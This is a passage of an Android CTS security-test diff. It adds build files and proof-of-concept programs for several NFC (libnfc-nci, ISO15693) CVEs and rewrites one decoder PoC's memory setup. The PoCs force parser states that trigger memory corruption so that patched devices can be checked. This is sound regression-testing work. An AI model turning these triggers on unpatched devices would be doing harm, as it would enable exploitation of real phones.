free(decoder->smoothState); - decoder->smoothState = nullptr; - } - free(decoder); - decoder = nullptr; - } - return errorCode; -} - int main() { - spatialDec *decoder = (spatialDec *)malloc(sizeof(spatialDec)); - if (!decoder) { - return EXIT_FAILURE; - } - SPATIAL_BS_FRAME *frame = - (SPATIAL_BS_FRAME *)malloc(sizeof(SPATIAL_BS_FRAME)); + spatialDec decoder; + memset(&decoder, 0x0, sizeof(spatialDec)); - RETURN_EXIT_FAILURE_IF_NULL(frame); - memset(frame, 0x00, sizeof(SPATIAL_BS_FRAME)); + decoder.numOttBoxes = MAX_NUM_OTT; - RETURN_EXIT_FAILURE_IF_NULL(decoder); - memset(decoder, 0x00, sizeof(spatialDec)); + SPATIAL_SPECIFIC_CONFIG pConfigCurrent; + memset(&pConfigCurrent, 0x0, sizeof(SPATIAL_SPECIFIC_CONFIG)); + decoder.pConfigCurrent = &pConfigCurrent; - size_t allocSize = sizeof(LOSSLESSDATA) * MAX_NUM_OTT * MAX_NUM_PARAMETERS; + SCHAR ottCLDidxPrev[ARR_SIZE] = {}; + decoder.ottCLDidxPrev = (SCHAR **)&ottCLDidxPrev; - frame->CLDLosslessData = (LOSSLESSDATA *)malloc(allocSize); - RETURN_EXIT_FAILURE_IF_NULL(frame->CLDLosslessData); - memset(frame->CLDLosslessData, 0x00, allocSize); + int smgTime = 1; + decoder.smgTime = &smgTime; - frame->ICCLosslessData = (LOSSLESSDATA *)malloc(allocSize); - RETURN_EXIT_FAILURE_IF_NULL(frame->ICCLosslessData); - memset(frame->CLDLosslessData, 0x00, allocSize); + UCHAR smgData[ARR_SIZE] = {}; + decoder.smgData = (UCHAR **)&smgData; - frame->IPDLosslessData = (LOSSLESSDATA *)malloc(allocSize); - RETURN_EXIT_FAILURE_IF_NULL(frame->IPDLosslessData); - memset(frame->CLDLosslessData, 0x00, allocSize); + SMOOTHING_STATE smoothState; + memset(&smoothState, 0x0, sizeof(SMOOTHING_STATE)); + decoder.smoothState = &smoothState; - frame->numParameterSets = MAX_PARAMETER_SETS; - - for (int i = 0; i < MAX_NUM_OTT; ++i) { - (&frame->CLDLosslessData[i])->state = nullptr; - for (int j = 0; j < MAX_PARAMETER_SETS; ++j) { - (&frame->CLDLosslessData[i])->bsXXXDataMode[j] = 2; - } - (&frame->CLDLosslessData[i])->state = - (LOSSLESSSTATE *)malloc(sizeof(LOSSLESSSTATE)); - RETURN_EXIT_FAILURE_IF_NULL((&frame->CLDLosslessData[i])->state); - memset((&frame->CLDLosslessData[i])->state, 0x00, sizeof(LOSSLESSSTATE)); - } + decoder.arbitraryDownmix = 0; + (decoder.concealInfo).concealState = SpatialDecConcealState_Ok; - decoder->numOttBoxes = MAX_NUM_OTT; + const size_t allocSize = MAX_NUM_OTT * MAX_NUM_PARAMETERS; - decoder->pConfigCurrent = - (SPATIAL_SPECIFIC_CONFIG *)malloc(sizeof(SPATIAL_SPECIFIC_CONFIG)); - RETURN_EXIT_FAILURE_IF_NULL(decoder->pConfigCurrent); - memset(decoder->pConfigCurrent, 0x00, sizeof(SPATIAL_SPECIFIC_CONFIG)); + SPATIAL_BS_FRAME frame; + memset(&frame, 0x0, sizeof(SPATIAL_BS_FRAME)); - decoder->ottCLDidxPrev = (SCHAR **)malloc(sizeof(SCHAR *)); - RETURN_EXIT_FAILURE_IF_NULL(decoder->ottCLDidxPrev); - memset(decoder->ottCLDidxPrev, 0x00, sizeof(SCHAR *)); + frame.numParameterSets = MAX_PARAMETER_SETS; - decoder->smgTime = (int *)malloc(sizeof(int)); - RETURN_EXIT_FAILURE_IF_NULL(decoder->smgTime); - memset(decoder->smgTime, 0x00, sizeof(int)); + LOSSLESSDATA CLDLosslessData[allocSize] = {}; + frame.CLDLosslessData = CLDLosslessData; - decoder->smgData = (UCHAR **)malloc(sizeof(UCHAR *)); - RETURN_EXIT_FAILURE_IF_NULL(decoder->smgData); - memset(decoder->smgData, 0x00, sizeof(UCHAR *)); + LOSSLESSDATA ICCLosslessData[allocSize] = {}; + frame.ICCLosslessData = ICCLosslessData; - decoder->smoothState = (SMOOTHING_STATE *)malloc(sizeof(SMOOTHING_STATE)); - RETURN_EXIT_FAILURE_IF_NULL(decoder->smoothState); - memset(decoder->smoothState, 0x00, sizeof(SMOOTHING_STATE)); + LOSSLESSDATA IPDLosslessData[allocSize] = {}; + frame.IPDLosslessData = IPDLosslessData; - decoder->arbitraryDownmix = 0; - (decoder->concealInfo).concealState = SpatialDecConcealState_Ok; + for (int i = 0; i < MAX_NUM_OTT; ++i) { + for (int j = 0; j < MAX_PARAMETER_SETS; ++j) { + (frame.CLDLosslessData[i]).bsXXXDataMode[j] = 2; + } + LOSSLESSSTATE lossLessState; + (frame.CLDLosslessData[i]).state = &lossLessState; + } - SpatialDecDecodeFrame(decoder, frame); - return freeAllocatedMemoryAndReturn(frame, decoder, EXIT_SUCCESS); + SpatialDecDecodeFrame(&decoder, &frame); + return EXIT_SUCCESS; } diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0006/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0006/Android.bp new file mode 100644 index 00000000000..dbb07bc0870 --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0006/Android.bp @@ -0,0 +1,39 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at: + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + */ + +cc_test { + name: "CVE-2020-0006", + defaults: ["cts_hostsidetests_securitybulletin_defaults"], + srcs: [ + "poc.cpp", + ":cts_hostsidetests_securitybulletin_memutils", + ], + compile_multilib: "64", + cflags: [ + "-DCHECK_OVERFLOW", + "-DENABLE_SELECTIVE_OVERLOADING", + ], + include_dirs: [ + "system/nfc/src/nfc/include/", + "system/nfc/src/include/", + "system/nfc/src/gki/common/", + "system/nfc/src/gki/ulinux/", + ], + shared_libs: [ + "libnfc-nci", + ], +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0006/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0006/poc.cpp new file mode 100644 index 00000000000..e90150e9c43 --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0006/poc.cpp @@ -0,0 +1,126 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#include <stdlib.h> +#include <nfc_api.h> +#include <nfc_int.h> +#include <rw_int.h> +#include <tags_defs.h> + +#include "../includes/common.h" +#include "../includes/memutils.h" + +char enable_selective_overload = ENABLE_NONE; + +// borrowed from rw_i93.cc +#define RW_I93_FORMAT_DATA_LEN 8 + +extern tRW_CB rw_cb; +extern tNFC_CB nfc_cb; +void rw_init(void); +tNFC_STATUS rw_i93_select(uint8_t* p_uid); +void* vulnerable_ptr; + +// borrowed from rw_i93.cc +enum { + RW_I93_STATE_NOT_ACTIVATED, /* ISO15693 is not activated */ + RW_I93_STATE_IDLE, /* waiting for upper layer API */ + RW_I93_STATE_BUSY, /* waiting for response from tag */ + + RW_I93_STATE_DETECT_NDEF, /* performing NDEF detection precedure */ + RW_I93_STATE_READ_NDEF, /* performing read NDEF procedure */ + RW_I93_STATE_UPDATE_NDEF, /* performing update NDEF procedure */ + RW_I93_STATE_FORMAT, /* performing format procedure */ + RW_I93_STATE_SET_READ_ONLY, /* performing set read-only procedure */ + + RW_I93_STATE_PRESENCE_CHECK /* checking presence of tag */ +}; + +// borrowed from rw_i93.cc +enum { + RW_I93_SUBSTATE_WAIT_UID, /* waiting for response of inventory */ + RW_I93_SUBSTATE_WAIT_SYS_INFO, /* waiting for response of get sys info */ + RW_I93_SUBSTATE_WAIT_CC, /* waiting for reading CC */ + RW_I93_SUBSTATE_SEARCH_NDEF_TLV, /* searching NDEF TLV */ + RW_I93_SUBSTATE_CHECK_LOCK_STATUS, /* check if any NDEF TLV is locked */ + + RW_I93_SUBSTATE_RESET_LEN, /* set length to 0 to update NDEF TLV */ + RW_I93_SUBSTATE_WRITE_NDEF, /* writing NDEF and Terminator TLV */ + RW_I93_SUBSTATE_UPDATE_LEN, /* set length into NDEF TLV */ + + RW_I93_SUBSTATE_WAIT_RESET_DSFID_AFI, /* reset DSFID and AFI */ + RW_I93_SUBSTATE_CHECK_READ_ONLY, /* check if any block is locked */ + RW_I93_SUBSTATE_WRITE_CC_NDEF_TLV, /* write CC and empty NDEF/Terminator TLV + */ + + RW_I93_SUBSTATE_WAIT_UPDATE_CC, /* updating CC as read-only */ + RW_I93_SUBSTATE_LOCK_NDEF_TLV, /* lock blocks of NDEF TLV */ + RW_I93_SUBSTATE_WAIT_LOCK_CC /* lock block of CC */ +}; + +void* GKI_getbuf(uint16_t size) { + void* ptr = malloc(size); + if (size == RW_I93_FORMAT_DATA_LEN) { + vulnerable_ptr = ptr; + } + return ptr; +} + +void GKI_freebuf(void* p_buf) { + if (p_buf == vulnerable_ptr) { + free(p_buf); + } +} + +int main() { + enable_selective_overload = ENABLE_ALL; + tRW_I93_CB* p_i93 = &rw_cb.tcb.i93; + + GKI_init(); + rw_init(); + + uint8_t p_uid = 1; + if (rw_i93_select(&p_uid) != NFC_STATUS_OK) { + return EXIT_FAILURE; + } + + tNFC_CONN_CB* p_cb = &nfc_cb.conn_cb[NFC_RF_CONN_ID]; + tNFC_CONN_EVT event = NFC_DATA_CEVT; + + tNFC_CONN* p_data = (tNFC_CONN*)malloc(sizeof(tNFC_CONN)); + if (!p_data) { + return EXIT_FAILURE; + } + + p_data->data.p_data = (NFC_HDR*)malloc(sizeof(NFC_HDR)); + if (!(p_data->data.p_data)) { + free(p_data); + return EXIT_FAILURE; + } + + p_i93->state = RW_I93_STATE_FORMAT; + p_i93->sub_state = RW_I93_SUBSTATE_CHECK_READ_ONLY; + p_i93->block_size = I93_MAX_BLOCK_LENGH - 1; + p_data->status = NFC_STATUS_OK; + TIMER_LIST_ENT pFirst = {}; + nfc_cb.quick_timer_queue.p_first = &pFirst; + + p_cb->p_cback(0, event, p_data); + free(p_data->data.p_data); + free(p_data); + enable_selective_overload = ENABLE_NONE; + return EXIT_SUCCESS; +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0037/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0037/Android.bp new file mode 100644 index 00000000000..d6adf3ce8af --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0037/Android.bp @@ -0,0 +1,40 @@ +/* + * Copyright (C) 2020 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at: + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + */ + +cc_test { + name: "CVE-2020-0037", + defaults: ["cts_hostsidetests_securitybulletin_defaults"], + srcs: [ + "poc.cpp", + ":cts_hostsidetests_securitybulletin_memutils", + ], + cflags: [ + "-DCHECK_OVERFLOW", + "-DENABLE_SELECTIVE_OVERLOADING", + ], + compile_multilib: "64", + include_dirs: [ + "system/nfc/src/nfc/include/", + "system/nfc/src/include/", + "system/nfc/src/gki/common/", + "system/nfc/src/gki/ulinux/", + "system/nfc/src/nfa/include/", + ], + shared_libs: [ + "libnfc-nci", + ], +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0037/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0037/poc.cpp new file mode 100644 index 00000000000..766ee038b44 --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0037/poc.cpp @@ -0,0 +1,147 @@ +/* + * Copyright (C) 2020 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#include <stdlib.h> +#include "../includes/common.h" +#include "../includes/memutils.h" + +char enable_selective_overload = ENABLE_NONE; + +#include <dlfcn.h> +#include <nfc_api.h> +#include <nfc_int.h> +#include <rw_int.h> +#include <tags_defs.h> + +// borrowed from rw_i93.cc +extern tRW_CB rw_cb; +extern tNFC_CB nfc_cb; +void rw_init(void); +tNFC_STATUS rw_i93_select(uint8_t *p_uid); + +bool kIsInitialized = false; + +// borrowed from rw_i93.cc +enum { + RW_I93_STATE_NOT_ACTIVATED, /* ISO15693 is not activated */ + RW_I93_STATE_IDLE, /* waiting for upper layer API */ + RW_I93_STATE_BUSY, /* waiting for response from tag */ + + RW_I93_STATE_DETECT_NDEF, /* performing NDEF detection precedure */ + RW_I93_STATE_READ_NDEF, /* performing read NDEF procedure */ + RW_I93_STATE_UPDATE_NDEF, /* performing update NDEF procedure */ + RW_I93_STATE_FORMAT, /* performing format procedure */ + RW_I93_STATE_SET_READ_ONLY, /* performing set read-only procedure */ + + RW_I93_STATE_PRESENCE_CHECK /* checking presence of tag */ +}; + +// borrowed from rw_i93.cc +enum { + RW_I93_SUBSTATE_WAIT_UID, /* waiting for response of inventory */ + RW_I93_SUBSTATE_WAIT_SYS_INFO, /* waiting for response of get sys info */ + RW_I93_SUBSTATE_WAIT_CC, /* waiting for reading CC */ + RW_I93_SUBSTATE_SEARCH_NDEF_TLV, /* searching NDEF TLV */ + RW_I93_SUBSTATE_CHECK_LOCK_STATUS, /* check if any NDEF TLV is locked */ + + RW_I93_SUBSTATE_RESET_LEN, /* set length to 0 to update NDEF TLV */ + RW_I93_SUBSTATE_WRITE_NDEF, /* writing NDEF and Terminator TLV */ + RW_I93_SUBSTATE_UPDATE_LEN, /* set length into NDEF TLV */ + + RW_I93_SUBSTATE_WAIT_RESET_DSFID_AFI, /* reset DSFID and AFI */ + RW_I93_SUBSTATE_CHECK_READ_ONLY, /* check if any block is locked */ + RW_I93_SUBSTATE_WRITE_CC_NDEF_TLV, /* write CC and empty NDEF/Terminator TLV + */ + + RW_I93_SUBSTATE_WAIT_UPDATE_CC, /* updating CC as read-only */ + RW_I93_SUBSTATE_LOCK_NDEF_TLV, /* lock blocks of NDEF TLV */ + RW_I93_SUBSTATE_WAIT_LOCK_CC /* lock block of CC */ +}; + +static void *(*real_GKI_getbuf)(uint16_t size) = nullptr; +static void (*real_GKI_freebuf)(void *ptr) = nullptr; + +void init(void) { + real_GKI_getbuf = (void *(*)(uint16_t))dlsym(RTLD_NEXT, "_Z10GKI_getbuft"); + if (!real_GKI_getbuf) { + return; + } + + real_GKI_freebuf = (void (*)(void *))dlsym(RTLD_NEXT, "_Z11GKI_freebufPv"); + if (!real_GKI_freebuf) { + return; + } + + kIsInitialized = true; +} + +void *GKI_getbuf(uint16_t size) { + if (!kIsInitialized) { + init(); + } + return malloc(size); +} + +void GKI_freebuf(void *ptr) { + if (!kIsInitialized) { + init(); + } + free(ptr); +} + +int main() { + tRW_I93_CB *p_i93 = &rw_cb.tcb.i93; + + GKI_init(); + rw_init(); + + uint8_t p_uid = 1; + if (rw_i93_select(&p_uid) != NFC_STATUS_OK) { + return EXIT_FAILURE; + } + + tNFC_CONN_CB *p_cb = &nfc_cb.conn_cb[NFC_RF_CONN_ID]; + nfc_cb.quick_timer_queue.p_first = (TIMER_LIST_ENT *)malloc(16); + tNFC_CONN_EVT event = NFC_DATA_CEVT; + p_i93->state = RW_I93_STATE_SET_READ_ONLY; + p_i93->sub_state = RW_I93_SUBSTATE_WAIT_CC; + p_i93->block_size = 255; + + enable_selective_overload = ENABLE_ALL; + tNFC_CONN *p_data = (tNFC_CONN *)malloc(sizeof(tNFC_CONN)); + if (!p_data) { + free(nfc_cb.quick_timer_queue.p_first); + return EXIT_FAILURE; + } + + p_data->data.p_data = (NFC_HDR *)GKI_getbuf(sizeof(NFC_HDR)); + if (!(p_data->data.p_data)) { + free(p_data); + free(nfc_cb.quick_timer_queue.p_first); + return EXIT_FAILURE; + } + enable_selective_overload = ENABLE_NONE; + + (p_data->data.p_data)->len = 10; + p_data->data.p_data->offset = 0; + p_data->status = NFC_STATUS_OK; + + p_cb->p_cback(0, event, p_data); + + free(p_data); + free(nfc_cb.quick_timer_queue.p_first); + return EXIT_SUCCESS; +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0038/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0038/Android.bp new file mode 100644 index 00000000000..195d430aec5 --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0038/Android.bp @@ -0,0 +1,40 @@ +/* + * Copyright (C) 2020 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at: + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + */ + +cc_test { + name: "CVE-2020-0038", + defaults: ["cts_hostsidetests_securitybulletin_defaults"], + srcs: [ + "poc.cpp", + ":cts_hostsidetests_securitybulletin_memutils", + ], + cflags: [ + "-DCHECK_OVERFLOW", + "-DENABLE_SELECTIVE_OVERLOADING", + ], + compile_multilib: "64", + include_dirs: [ + "system/nfc/src/nfc/include/", + "system/nfc/src/include/", + "system/nfc/src/gki/common/", + "system/nfc/src/gki/ulinux/", + "system/nfc/src/nfa/include/", + ], + shared_libs: [ + "libnfc-nci", + ], +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0038/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0038/poc.cpp new file mode 100644 index 00000000000..27acfe3d319 --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0038/poc.cpp @@ -0,0 +1,147 @@ +/* + * Copyright (C) 2020 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#include <stdlib.h> +#include "../includes/common.h" +#include "../includes/memutils.h" + +char enable_selective_overload = ENABLE_NONE; + +#include <dlfcn.h> +#include <nfc_api.h> +#include <nfc_int.h> +#include <rw_int.h> +#include <tags_defs.h> + +// borrowed from rw_i93.cc +extern tRW_CB rw_cb; +extern tNFC_CB nfc_cb; +void rw_init(void); +tNFC_STATUS rw_i93_select(uint8_t *p_uid); + +bool kIsInitialized = false; + +// borrowed from rw_i93.cc +enum { + RW_I93_STATE_NOT_ACTIVATED, /* ISO15693 is not activated */ + RW_I93_STATE_IDLE, /* waiting for upper layer API */ + RW_I93_STATE_BUSY, /* waiting for response from tag */ + + RW_I93_STATE_DETECT_NDEF, /* performing NDEF detection precedure */ + RW_I93_STATE_READ_NDEF, /* performing read NDEF procedure */ + RW_I93_STATE_UPDATE_NDEF, /* performing update NDEF procedure */ + RW_I93_STATE_FORMAT, /* performing format procedure */ + RW_I93_STATE_SET_READ_ONLY, /* performing set read-only procedure */ + + RW_I93_STATE_PRESENCE_CHECK /* checking presence of tag */ +}; + +// borrowed from rw_i93.cc +enum { + RW_I93_SUBSTATE_WAIT_UID, /* waiting for response of inventory */ + RW_I93_SUBSTATE_WAIT_SYS_INFO, /* waiting for response of get sys info */ + RW_I93_SUBSTATE_WAIT_CC, /* waiting for reading CC */ + RW_I93_SUBSTATE_SEARCH_NDEF_TLV, /* searching NDEF TLV */ + RW_I93_SUBSTATE_CHECK_LOCK_STATUS, /* check if any NDEF TLV is locked */ + + RW_I93_SUBSTATE_RESET_LEN, /* set length to 0 to update NDEF TLV */ + RW_I93_SUBSTATE_WRITE_NDEF, /* writing NDEF and Terminator TLV */ + RW_I93_SUBSTATE_UPDATE_LEN, /* set length into NDEF TLV */ + + RW_I93_SUBSTATE_WAIT_RESET_DSFID_AFI, /* reset DSFID and AFI */ + RW_I93_SUBSTATE_CHECK_READ_ONLY, /* check if any block is locked */ + RW_I93_SUBSTATE_WRITE_CC_NDEF_TLV, /* write CC and empty NDEF/Terminator TLV + */ + + RW_I93_SUBSTATE_WAIT_UPDATE_CC, /* updating CC as read-only */ + RW_I93_SUBSTATE_LOCK_NDEF_TLV, /* lock blocks of NDEF TLV */ + RW_I93_SUBSTATE_WAIT_LOCK_CC /* lock block of CC */ +}; + +static void *(*real_GKI_getbuf)(uint16_t size) = nullptr; +static void (*real_GKI_freebuf)(void *ptr) = nullptr; + +void init(void) { + real_GKI_getbuf = (void *(*)(uint16_t))dlsym(RTLD_NEXT, "_Z10GKI_getbuft"); + if (!real_GKI_getbuf) { + return; + } + + real_GKI_freebuf = (void (*)(void *))dlsym(RTLD_NEXT, "_Z11GKI_freebufPv"); + if (!real_GKI_freebuf) { + return; + } + + kIsInitialized = true; +} + +void *GKI_getbuf(uint16_t size) { + if (!kIsInitialized) { + init(); + } + return malloc(size); +} + +void GKI_freebuf(void *ptr) { + if (!kIsInitialized) { + init(); + } + free(ptr); +} + +int main() { + tRW_I93_CB *p_i93 = &rw_cb.tcb.i93; + + GKI_init(); + rw_init(); + + uint8_t p_uid = 1; + if (rw_i93_select(&p_uid) != NFC_STATUS_OK) { + return EXIT_FAILURE; + } + + tNFC_CONN_CB *p_cb = &nfc_cb.conn_cb[NFC_RF_CONN_ID]; + nfc_cb.quick_timer_queue.p_first = (TIMER_LIST_ENT *)malloc(16); + tNFC_CONN_EVT event = NFC_DATA_CEVT; + p_i93->state = RW_I93_STATE_UPDATE_NDEF; + p_i93->sub_state = RW_I93_SUBSTATE_RESET_LEN; + p_i93->block_size = 30; + + enable_selective_overload = ENABLE_ALL; + tNFC_CONN *p_data = (tNFC_CONN *)malloc(sizeof(tNFC_CONN)); + if (!p_data) { + free(nfc_cb.quick_timer_queue.p_first); + return EXIT_FAILURE; + } + + p_data->data.p_data = (NFC_HDR *)GKI_getbuf(sizeof(NFC_HDR)); + if (!(p_data->data.p_data)) { + free(p_data); + free(nfc_cb.quick_timer_queue.p_first); + return EXIT_FAILURE; + } + enable_selective_overload = ENABLE_NONE; + + (p_data->data.p_data)->len = 10; + p_data->data.p_data->offset = 0; + p_data->status = NFC_STATUS_OK; + + p_cb->p_cback(0, event, p_data); + + free(p_data); + free(nfc_cb.quick_timer_queue.p_first); + return EXIT_SUCCESS; +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0039/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0039/Android.bp new file mode 100644 index 00000000000..16dac281b93 --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0039/Android.bp @@ -0,0 +1,40 @@ +/* + * Copyright (C) 2020 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at: + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + */ + +cc_test { + name: "CVE-2020-0039", + defaults: ["cts_hostsidetests_securitybulletin_defaults"], + srcs: [ + "poc.cpp", + ":cts_hostsidetests_securitybulletin_memutils", + ], + cflags: [ + "-DCHECK_OVERFLOW", + "-DENABLE_SELECTIVE_OVERLOADING", + ], + compile_multilib: "64", + include_dirs: [ + "system/nfc/src/nfc/include/", + "system/nfc/src/include/", + "system/nfc/src/gki/common/", + "system/nfc/src/gki/ulinux/", + "system/nfc/src/nfa/include/", + ], + shared_libs: [ + "libnfc-nci", + ], +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0039/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0039/poc.cpp new file mode 100644 index 00000000000..6ebc3f331ae --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0039/poc.cpp @@ -0,0 +1,148 @@ +/* + * Copyright (C) 2020 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#include <stdlib.h> +#include "../includes/common.h" +#include "../includes/memutils.h" + +char enable_selective_overload = ENABLE_NONE; + +#include <dlfcn.h> +#include <nfc_api.h> +#include <nfc_int.h> +#include <rw_int.h> +#include <tags_defs.h> + +// borrowed from rw_i93.cc +extern tRW_CB rw_cb; +extern tNFC_CB nfc_cb; +void rw_init(void); +tNFC_STATUS rw_i93_select(uint8_t *p_uid); + +bool kIsInitialized = false; + +// borrowed from rw_i93.cc +enum { + RW_I93_STATE_NOT_ACTIVATED, /* ISO15693 is not activated */ + RW_I93_STATE_IDLE, /* waiting for upper layer API */ + RW_I93_STATE_BUSY, /* waiting for response from tag */ + + RW_I93_STATE_DETECT_NDEF, /* performing NDEF detection precedure */ + RW_I93_STATE_READ_NDEF, /* performing read NDEF procedure */ + RW_I93_STATE_UPDATE_NDEF, /* performing update NDEF procedure */ + RW_I93_STATE_FORMAT, /* performing format procedure */ + RW_I93_STATE_SET_READ_ONLY, /* performing set read-only procedure */ + + RW_I93_STATE_PRESENCE_CHECK /* checking presence of tag */ +}; + +// borrowed from rw_i93.cc +enum { + RW_I93_SUBSTATE_WAIT_UID, /* waiting for response of inventory */ + RW_I93_SUBSTATE_WAIT_SYS_INFO, /* waiting for response of get sys info */ + RW_I93_SUBSTATE_WAIT_CC, /* waiting for reading CC */ + RW_I93_SUBSTATE_SEARCH_NDEF_TLV, /* searching NDEF TLV */ + RW_I93_SUBSTATE_CHECK_LOCK_STATUS, /* check if any NDEF TLV is locked */ + + RW_I93_SUBSTATE_RESET_LEN, /* set length to 0 to update NDEF TLV */ + RW_I93_SUBSTATE_WRITE_NDEF, /* writing NDEF and Terminator TLV */ + RW_I93_SUBSTATE_UPDATE_LEN, /* set length into NDEF TLV */ + + RW_I93_SUBSTATE_WAIT_RESET_DSFID_AFI, /* reset DSFID and AFI */ + RW_I93_SUBSTATE_CHECK_READ_ONLY, /* check if any block is locked */ + RW_I93_SUBSTATE_WRITE_CC_NDEF_TLV, /* write CC and empty NDEF/Terminator TLV + */ + + RW_I93_SUBSTATE_WAIT_UPDATE_CC, /* updating CC as read-only */ + RW_I93_SUBSTATE_LOCK_NDEF_TLV, /* lock blocks of NDEF TLV */ + RW_I93_SUBSTATE_WAIT_LOCK_CC /* lock block of CC */ +}; + +static void *(*real_GKI_getbuf)(uint16_t size) = nullptr; +static void (*real_GKI_freebuf)(void *ptr) = nullptr; + +void init(void) { + real_GKI_getbuf = (void *(*)(uint16_t))dlsym(RTLD_NEXT, "_Z10GKI_getbuft"); + if (!real_GKI_getbuf) { + return; + } + + real_GKI_freebuf = (void (*)(void *))dlsym(RTLD_NEXT, "_Z11GKI_freebufPv"); + if (!real_GKI_freebuf) { + return; + } + + kIsInitialized = true; +} + +void *GKI_getbuf(uint16_t size) { + if (!kIsInitialized) { + init(); + } + return malloc(size); +} + +void GKI_freebuf(void *ptr) { + if (!kIsInitialized) { + init(); + } + free(ptr); +} + +int main() { + tRW_I93_CB *p_i93 = &rw_cb.tcb.i93; + + GKI_init(); + rw_init(); + + uint8_t p_uid = 1; + if (rw_i93_select(&p_uid) != NFC_STATUS_OK) { + return EXIT_FAILURE; + } + + tNFC_CONN_CB *p_cb = &nfc_cb.conn_cb[NFC_RF_CONN_ID]; + nfc_cb.quick_timer_queue.p_first = (TIMER_LIST_ENT *)malloc(16); + tNFC_CONN_EVT event = NFC_DATA_CEVT; + p_i93->state = RW_I93_STATE_UPDATE_NDEF; + p_i93->sub_state = RW_I93_SUBSTATE_UPDATE_LEN; + p_i93->block_size = 30; + p_i93->rw_length = 1; + + enable_selective_overload = ENABLE_ALL; + tNFC_CONN *p_data = (tNFC_CONN *)malloc(sizeof(tNFC_CONN)); + if (!p_data) { + free(nfc_cb.quick_timer_queue.p_first); + return EXIT_FAILURE; + } + + p_data->data.p_data = (NFC_HDR *)GKI_getbuf(sizeof(NFC_HDR)); + if (!(p_data->data.p_data)) { + free(p_data); + free(nfc_cb.quick_timer_queue.p_first); + return EXIT_FAILURE; + } + enable_selective_overload = ENABLE_NONE; + + (p_data->data.p_data)->len = 10; + 